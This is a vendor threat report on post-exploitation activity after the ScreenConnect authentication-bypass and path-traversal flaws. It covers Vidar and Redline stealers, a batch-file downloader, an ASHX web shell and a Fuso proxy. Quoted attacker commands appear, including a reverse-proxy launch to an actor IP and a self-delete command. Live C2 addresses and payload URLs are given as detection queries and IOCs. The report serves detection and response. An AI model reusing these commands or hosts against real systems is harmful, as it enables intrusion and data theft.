Introduction
On 21 February 2024 two critical vulnerabilities in the ScreenConnect were released on NVD. ScreenConnect is software for remote desktop and access software from company ConnectWise. The first was CVE-2024-1708[1] which is path-traversal vulnerability. This vulnerability is rated CVSS score of 8.4 (High). The second vulnerability is CVE-2024-1709[2] which is an authentication bypass vulnerability and is rated CVSS score of 10 (Critical). ConnectWise ScreenConnect software version 23.9.7 and prior are affected by both of these vulnerabilities[3].
On 21 February 2024 researchers from company Huntress released PoC by chaining these two ScreenConnect vulnerabilities to get RCE (Remote Code Execution) on the victim machine running vulnerable ScreenConnect version[4]. Researchers from Huntress have only released a video demo of exploit and not released the PoC exploit code to public. There are also a number of separate PoC exploits released on GitHub by some security researchers[5] [6] [7].
In the same week, FortiGuard MDR and the FortiGuard IR team responded to several incidents related to exploitation of this vulnerability. In some cases, more than one threat actor was observed exploiting the same vulnerable endpoints over this period. This article will outline how FortiEDR was able to effectively detect and respond to all observed post-exploitation activity associated with exploitation of this vulnerability across these various intrusions.
Analysis
Intrusion Type 1 – Drop Vidar and Execute
The FortiGuard MDR team detected events in a client environment where a malicious file named ‘ScreenConnectUpdate.exe’ was being executed on multiple hosts from different paths. FortiEDR flagged this file execution as malicious as the executable triggered the ‘Suspicious Packer’ and ‘Writable Code’ rules from the ‘Exfiltration Prevention’ security policy, effectively blocking the execution. An example of one of these security events can be observed in Figure 2 below. It is worth noting that at the time of execution the file did not have a known malicious signature but characteristics of the file and anomalies in the associated process triggered FortiEDR’s behavior-based rules.
Figure 1. FortiEDR blocked execution of malicious 'ScreenConnectUpdate.exe'
Investigation through FortiEDR data confirmed that the file was dropped through exploitation of the ScreenConnect vulnerability. We can observe that this file was created by the ‘ScreenConnect.WindowsClient.exe’ process using FortiEDR Threat Hunting telemetry, as shown in Figure 2 below.
Figure 2. FortiEDR Threat Hunting data showing malicious file 'ScreenConnectUpdate.exe' was created by ScreenConnect software.
When we analyzed this malicious ‘ScreenConnectUpdate.exe’ file’s hash in FortiGuard CTS it was found that this file was marked as Vidar malware stealer which can be observed in Figure 3 below.
Figure 3. FortiGuard CTS showing malicious file tagged as Vidar Malware.
While doing further analysis we ran ExifTools on ‘ScreenConnectUpdate.exe’. The language code of the executable file was found to be ‘Farsi’, which is official language of the countries Iran, Afghanistan, Tajikistan. The output of ExifTools can be seen in Figure 4 below.
Figure 4. ExifTool output for the malicious file ScreenConnectUpdate.exe
To check further about the behavior of this malicious file, we executed in a test environment with FortiEDR configured in ‘Log Only’ mode. When this file was executed, it communicated with two different URLs. One was ‘hxxp[:]//t[.]me/hypergog’ which is Telegram messenger profile URL and other was ‘hxxps[:]//steamcommunity[.]com/profiles/76561199642171824’ which is Steam gaming community profile. These are legitimate services that have been used to implement the drop-dead resolver technique (). These two profiles had information about additional separate command and control (C2) infrastructure, to which the malicious executable would connect. These two profiles can be seen in Figure 5 and 6 below.
Figure 5. Telegram messenger profile showing C2 IP and Port information
Figure 6. Steam gaming community profile showing C2 URL
As we can observe from the above two images, both these profiles had specific keyword ‘set8b’ after which C2 URL was given in the profile name. The malicious executable extracted this C2 information from the profile and then connected to the C2 URL which was present in the Telegram profile. We suspect the C2 URL given in the Steam gaming community profile is a fallback C2 URL. This can be observed in the Threat Hunting data shown in Figure 7.
Figure 7. FortiEDR Threat Hunting data showing Telegram connection and then C2 communication.
The communication with C2 occurred on non-standard port (T1571 – Non-Standard Port) and was encrypted using TLSv1.2. (http-over-tls) (T1537 – Encrypted Channel). After establishing initial C2 communication the executable (ScreenConnectUpdate.exe) downloaded a DLL from C2 (sqlm[1].dll) and wrote it to C:\Users\<UserName>\AppData\Local\Microsoft\Windows\INetCache\IE\C2CDXEP5\sqlm[1].dll. Once downloaded the file was loaded by the main executable process. After that the executable created files with random capital alphabets as name (possibly with stolen data from victim host). Then executable communicated some data over encrypted channel to C2 and then the process terminated.
The malicious file then spawned thread to do network communication with the C2 server. The file triggered rules ‘Dynamic Code’, ‘Suspicious Packer’, ‘Unmapped Executable’, ‘Writable Code’ from the FortiEDR Exfiltration Prevention policy. This can be observed in Figure 8. below
Figure 8. Network communication of the Vidar executable (ScreenConnectUpdate.exe) was blocked by FortiEDR
Before the process exited it ran command to delete ‘ScreenConnectUpdate.exe’ and all DLL files from path ‘C:\ProgramData\’. This would remove the main malicious Vidar executable and any other DLL files that were previously downloaded in this folder. The command used for this was as follows:
cmd.exe /c timeout /t 5 & del /f /q "\\<user_Documents>\ConnectWiseControl\Temp\ScreenConnectUpdate.exe" & del "C:\ProgramData\*.dll"" & exit
This identical activity was observed in three separate customer environments with customers located in different geographic locations in USA indicating this attack was likely opportunistic and did not specifically target the victim organizations.
Intrusion Type 2 – Drop Batch File, PowerShell Dropper, Execute Malware
A separate cluster of post exploitation observed within several customer environments was the use of intermediate batch files dropped and executed through exploitation of the vulnerability. In one instance the threat actor dropped a batch file with name ‘r.bat’ to the ‘C:\Windows\Temp\ScreenConnect\23.9.10.8817\’ path and attempted to execute it through exploitation of the vulnerable ScreenConnect software. The contents of the .BAT file were retrieved by the FortiGuard IR team. The contents of the bat file can be observed in Figure 9 below.
Figure 9. Content of Malicious r.bat file.
As we can observe by the code in the ‘r.bat’ file, this file has 4 static/hardcoded download URLs. The bat file chooses one URL randomly out of these four URLs to download payload This payload is saved as ‘C:/Windows/temp/1.exe’. Then it executes the file ‘1.exe’.
The network communication attempt of bitsadmin.exe which was executed by ‘r.bat’. This behavior triggered the rule ‘Suspicious Application’ under FortiEDR’s ‘Exfiltration Prevention’ security policy which blocked the network connection, preventing the intrusion from progressing. The associated security event can be observed in Figure 10 below.
Figure 10. Network communication of bitsadmin.exe detected and blocked by FortiEDR.
For analysis we manually downloaded the payload from the URL from the ‘r.bat’ file. Then after downloading this payload (‘1.exe’) it was analyzed further. The 1.exe (SHA1 - cc504e720745db5061e41528a2d36976b20bc0e7) was found to be created in the Rust programming language. When we detonated ‘1.exe’ file in test environment, this file created a copy of itself in the path format
{Folder path}\{original filename}.{random 32 lowercase alphabets}.__selfdelete__.exe
Analysis of the ’1.exe’ executable identified that it performs anti-debug checks by using API IsDebuggerPresent. If a debugger is found the file would stop execution. This can be observed in the screenshot of file assembly code in Figure 11 below:
Figure 11. Disassembled code of 1.exe showing debugger check function.
The file was also checking for existence of the file ‘C:/windows/temp/0’. This ‘0’ file was being created by the r.bat. This might be an anti-analysis technique to stop file execution if ‘r.bat’ was not run prior to file execution. Further analysis of this file is ongoing.
Incident Type 3 – Drop web shell and attempt to use web shell to execute commands
Another cluster of activity involved the ScreenConnect vulnerability being used to drop web shells on the victim host. These web shells were uploaded as extensions of the ScreenConnect web application. One of these web shells was the .ASHX webpage shown below in Figure 12.
Figure 12. Source code of the web shell dropped on ScreenConnect server.
This web shell is a version of the open-source PoC used for the exploitation of the ScreenConnect vulnerability available on GitHub and created by user ‘W01fh4cker’[8]. The web shell is very simple and just executes ‘cmd.exe’ with parameter ‘/c’ and commands sent as a plain string in the ‘cmd’ field of a received web request. At the time of the intrusion FortiEDR was not configured to retain Threat Hunting data long enough to detect the associated file create event for this web shell. However, we can use the following Threat Hunting query below to detect the creation of similar web shells. Note that there may be false positives associated with this query so should be tuned before deploying in production.
Type: ("File Create") AND Target.File.Ext: ("ashx") AND Source.Process.Name:("ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe")
Incident Type 4 – Drop Proxy to setup reverse shell
In one affected customer environment a threat actor was observed downloading and attempting to execute an executable file ‘fuc.exe’ from the ‘C:\users\Public’ directory. The execution attempt was made using windows ‘cmd.exe’ with following command line arguments spawned directly from the ScreenConnect main process (ScreenConnect.Client.exe):
cmd.exe /c c:\users\public\fuc.exe 165.227.108.117 8443 --socks --socks-udp --socks-username fuc --socks-password fuc
When we analyzed the ‘fuc.exe’ file we found that it is a custom compiled version of the open-source proxy tool ‘fuso’[9] which the author calls as ‘An intranet penetration proxy tool’. We can see the name and GitHub link when we execute it in test environment with ‘--help’ parameter. This can be observed in Figure 13 below.
Figure 13. Open-source intranet penetration proxy tool - Fuso
This tool has a heavy Chinese userbase but is not currently attributed to any threat actor. This tool’s features list includes ‘transmission encryption’, so that means data transferred by this tool will be encrypted over the network. When this ‘fuc.exe’ is executed the FortiEDR detects it as malicious file and blocks the execution of file. We can observe this in figure 14 below.
Figure 14. Execution of the malicious proxy tool fuc.exe was blocked by FortiEDR
Incident Type 5 – Drop Redline and execute
In a separate intrusion a threat actor dropped and attempted to execute a file ‘qemu-ga.exe’ using an intermediate file with name ‘ScreenConnectUpdate.exe’. We identified this file as a version of Redline stealer. FortiEDR detected this ‘qemu-ga.exe’ as a malicious file and blocked its execution. The security event associated with this detection and block can be observed in figure 15 below.
Figure 15. FortiEDR blocking execution of Redline stealer malware.
The ‘ScreenConnectUpdate.exe’ file discussed in the earlier event is different than the file in this case of Redline stealer. The ‘ScreenConnectUpdate.exe’ name seems to be taken by multiple threat actors to make it look legitimate or some kind of ScreenConnect update process. In this current event this file is loader of Redline stealer malware.
Redline is a popular infostealer that has been employed by various threat actor groups. Link to our existing KB : https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-Redline-Ste...
Conclusion
As described in the article multiple threat actors are opportunistically trying to exploit the ScreenConnect vulnerability to gain access to the victim network and try to launch further attacks. In some cases, we have identified infrastructure overlap with intrusions related to exploitation of other recent vulnerabilities such as the recent Ivanti Connect Secure vulnerabilities. Fortunately, since FortiEDR detection is behavioral based, it is able to detect the multiple different types of post exploitation activity associated with this vulnerability. In the cases we have observed we can see that FortiEDR has blocked malicious payloads of malware families Vidar, Redline which were seen across the global FortiEDR and FortiGuard MDR customer base.
The article also provides Threat Hunting queries so the FortiEDR environments can be checked pro-actively for the indicators of some of this activity.
Threat Hunting
Following Threat Hunting query will detect File Create events associated with the creation of 'ScreenConnectUpdate.exe' through the legitimate ScreenConnect executable (ScreenConnect.Client.exe). Note that this filename has been linked to two distinct clusters of post-exploitation activity.
Type: ("File Create") AND Source.Process.Name:("ScreenConnect.WindowsClient.exe" OR "ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe") AND Target.File.Name: ("ScreenConnectUpdate.exe")
Following Threat Hunting query will detect Process Creation events associated with the execution of 'ScreenConnectUpdate.exe' from the ScreenConnect software. A file with the name ‘ScreenConnectUpdate.exe does not match with any legitimate ScreenConnect components:
Type: ("Process Creation") AND Source.Process.Name:("ScreenConnect.WindowsClient.exe" OR "ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe") AND Target.Process.Name:("ScreenConnectUpdate.exe")
Following Threat Hunting query will detect Process Creation event where cmd.exe is spawned by ScreenConnect software. Please note that there might be legitimate uses where cmd.exe is executed over ScreenConnect, in which case this query will return false positives:
Type: ("Process Creation") AND Source.Process.Name:("ScreenConnect.WindowsClient.exe" OR "ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe") AND Target.Process.Name:("cmd.exe")
Following Threat Hunting query will detect detect File Create events with .ASHX (i.e. WebShell) extension file dropped by ScreenConnect software in the path ‘C:\Program Files (x86)\ScreenConnect\App_Extensions\’ :
Type: ("File Create") AND Target.File.Ext:("ashx") AND Target.File.Path: ("C\:\\Program Files \(x86\)\\ScreenConnect\\App_Extensions") AND Source.Process.Name:("ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe")
Following Threat Hunting query will detect ‘HTTP Request’ events of C2 connection happening by 'ScreenConnectUpdate.exe' to particular C2 URLs found in current campaign.
Type: ("HTTP Request") AND Source.Process.Name:("ScreenConnectUpdate.exe") AND URL: ("http\:\/\/142.132.224.223\:9001" OR "https\:\/\/65.109.172.49")
Following Threat Hunting query will detect malicious payload download attempt from given URLs:
Type: ("HTTP Request") AND URL:("http\:\/\/shapefiles.fews.net.s3.amazonaws.com\:80\/8gaLYHLcZ4DPV" OR "http\:\/\/brandnav-cms-storage.s3.amazonaws.com\:80\/VBtGzOcze428R" OR "http\:\/\/banglarchokhprotidin.s3-ap-southeast-1.amazonaws.com\/ZnhOgW4OnnPIH" OR "http\:\/\/mapimages.fews.net.s3.amazonaws.com\:80\/Joqyh6eNHht7n")
MITRE ATT&CK
Note: The indicators in observed activity for each MITRE technique are relevant to analyzed campaigns and may change in future campaigns.
TA0001 – Initial Access
|
Technique ID |
Technique Description |
Observed Activity |
|
T1190 |
Exploit Public-Facing Application |
The ScreenConnect public facing application is exploited by the threat actors. |
TA0002 - Execution
|
Technique ID |
Technique Description |
Observed Activity |
|
T1059.003 |
Command and Scripting Interpreter: Windows Command Shell |
The web shell dropped by Threat Actor uses cmd.exe to execute the received commands. |
TA0003 - Persistence
|
Technique ID |
Technique Description |
Observed Activity |
|
T1505.003 |
Server Software Component: Web Shell |
The web shell with extension .ASHX was dropped by Threat Actor. |
TA0005 - Defense Evasion
|
Technique ID |
Technique Description |
Observed Activity |
|
T1070 |
Indicator Removal: File Deletion |
The r.bat file used by Threat Actor was deleting the ‘ScreenConnectUpdate.exe’ & ‘C:\ProgramData\*.dll’ |
|
T1622 |
Debugger Evasion |
The malicious file ‘1.exe’ checking presence of debugger using API IsDebuggerPresent |
TA0011 - Command and Control
|
Technique ID |
Technique Description |
Observed Activity |
|
T1102.001 |
Web Service: Dead Drop Resolver |
Threat Actor which dropped Vidar malware used Telegram and Steam game profiles to point to additional C2 infrastructure. |
|
T1571 |
Non-Standard Port |
The Vidar executable was communicating with C2 IP on non-standard port 9001. |
|
T1573 |
Encrypted Channel |
Vidar executable was communicating to C2 in encrypted channel which was http-over-tls. |
|
T1008 |
Fallback Channels |
The Vidar executable had fallback C2 stored in Steam game profile. Which was not used when C2 IP got from Telegram Profile was connected. |
|
T1105 |
Ingress Tool Transfer |
Vidar executable downloaded DLL file sqlm[1].dll. |
|
T1095 |
Non-Application Layer Protocol |
The proxy tool fuc.exe used by threat actor was communicating on UDP protocol. |
|
T1090 |
Proxy |
Proxy tool Fuso (fuc.exe) was used by threat actor to attempt reverse proxy connection to actor provided IP address. |
IOCs
|
Indicator Description |
Indicator |
Indicator Type |
Associated Tactic |
Notes |
First Observed |
|
Malicious Executable |
013f5aa9057bf0b3c0c24824de9d075434501354 |
|
Installation |
qemu-ga.exe (Redline stealer) |
2023-12-23 |
|
Malicious Executable |
9b860be98a046ea97a7f67b006e0b1bc9ab7731dd2a0f3a9fd3d710f6c43278a |
SHA256 Hash |
Installation |
qemu-ga.exe (Redline stealer) |
2023-12-23 |
|
Malicious Executable |
cc504e720745db5061e41528a2d36976b20bc0e7 |
SHA1 Hash |
Installation |
VBtGzOcze428R (1.exe) unconfirmed malicious executable |
2024-02-22 |
|
Malicious Executable |
0c2c8280701706e0772cb9be83502096e94ad4d9c21d576db0bc627e1e84b579 |
SHA256 Hash |
Installation |
VBtGzOcze428R (1.exe) unconfirmed malicious executable |
2024-02-22 |
|
Malicious Executable |
50daf81662e54fa1dc73abb280145b6ee99fd87c |
SHA1 Hash |
Installation |
ScreenConnectUpdate.exe (vidar stealer) |
2024-02-22 |
|
Malicious Executable |
ab99cab6e179978e4c46e1ac17ba613be0f507224e0258fb2ec9ddb93e6f10e4 |
SHA256 Hash |
Installation |
ScreenConnectUpdate.exe (vidar stealer) |
2024-02-22 |
|
Malicious URL |
hxxp[:]//142.132.224[.]223:9001 |
URL |
Installation |
Vidar C2 URL |
2024-02-25 |
|
Malicious URL |
hxxps[:]//65.109.172[.]49 |
URL |
Installation |
Vidar C2 URL |
2024-02-25 |
|
Malicious Executable |
be33f41f7d58bb28ad5c0535bab6c9dd5deb7da2 |
SHA1 Hash |
Installation |
ScreenConnectUpdate.exe (redline loader) |
2024-02-22 |
|
Malicious Executable |
d89ddcd894bff46b4217e0717f80d530e2bb912a5b4518478077f9963903a5f0 |
SHA256 Hash |
Installation |
ScreenConnectUpdate.exe (redline loader) |
2024-02-22 |
[1] https://nvd.nist.gov/vuln/detail/CVE-2024-1708
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-1709
[3] https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
[4] https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authenticati...
[5] https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
[6] https://github.com/HussainFathy/CVE-2024-1709/blob/main/CVE-2024-1709.py
[7] https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
[8] https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE/blob/main/ScreenConnect-AuthBypass-RCE.py
[9] https://github.com/editso/fuso
